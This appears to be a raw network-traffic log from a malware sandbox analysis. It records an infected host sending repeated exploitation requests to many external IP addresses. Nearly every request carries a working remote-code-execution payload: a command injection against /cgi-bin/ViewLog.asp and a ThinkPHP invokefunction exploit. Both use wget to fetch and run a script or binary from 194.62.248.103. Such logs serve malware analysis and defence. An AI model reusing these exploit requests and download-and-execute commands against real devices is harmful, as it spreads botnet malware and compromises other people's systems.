                                                        Apr 14, 2024 16:36:28.345369101 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:40.375722885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.972261906 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:55.117433071 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.234009431.41.161.848080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.149194956 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:19.482023954 CEST313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.235756062.30.154.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.447328091 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:09.894773960 CEST304INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:09 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.235731694.123.5.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.468475103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.234099095.86.92.1768080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.480532885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.235682694.121.44.1278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.501806021 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.236010495.101.240.12080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.236685038 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.528311968 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 64 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 30 26 23 34 36 3b 66 36 64 31 61 64 36 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 64 62 30 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 30 26 23 34 36 3b 66 36 64 31 61 64 36 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cdb0f748&#46;1713105380&#46;f6d1ad6<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cdb0f748&#46;1713105380&#46;f6d1ad6</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.235757295.80.205.10880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.244435072 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.543273926 CEST420INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Server: Apache/2.4.57 (Ubuntu)
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.235861695.164.39.4880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.252031088 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.557898998 CEST325INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 96<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.236063895.128.199.18680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.254920006 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.563901901 CEST295INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.235738495.98.93.18380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.264041901 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.593575001 CEST880INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.21 18


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.234306095.164.172.2880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.274271011 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:20.602864027 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.233353295.167.157.24280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.356060982 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.458216906 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.868767977 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.235834231.207.37.1198080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.439074993 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:20.736893892 CEST305INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:20 GMT
                                                        Server: Apache
                                                        Content-Length: 127
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.234879094.153.234.1388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.480824947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.235584694.121.141.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.481204033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.234872894.121.207.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:20.484539032 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
